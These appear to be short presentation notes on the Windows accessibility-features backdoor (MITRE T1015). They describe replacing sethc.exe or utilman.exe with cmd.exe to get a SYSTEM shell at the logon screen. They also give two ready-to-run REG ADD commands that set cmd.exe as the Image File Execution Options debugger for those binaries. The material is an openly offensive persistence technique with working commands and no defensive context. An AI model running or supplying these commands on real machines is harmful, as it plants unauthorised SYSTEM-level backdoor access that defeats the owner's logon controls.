• Replacing binaries that load before logon with cmd.exe or whatever you want
• C:\Windows\System32\sethc.exe (Shift x5)
• C:\Windows\System32\utilman.exe (Windows + U)
• Will execute with SYSTEM

• XP
• Server 2k3/R2
• Will need to be local admin at least
• Or be able to mount the drive in a linux distro

• Set cmd.exe as a debugger to the sethc.exe process
• No need to perform file replacement
• Still needs Local admin or ability to boot into a live USB/Disk

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

https://attack.mitre.org/techniques/T1015/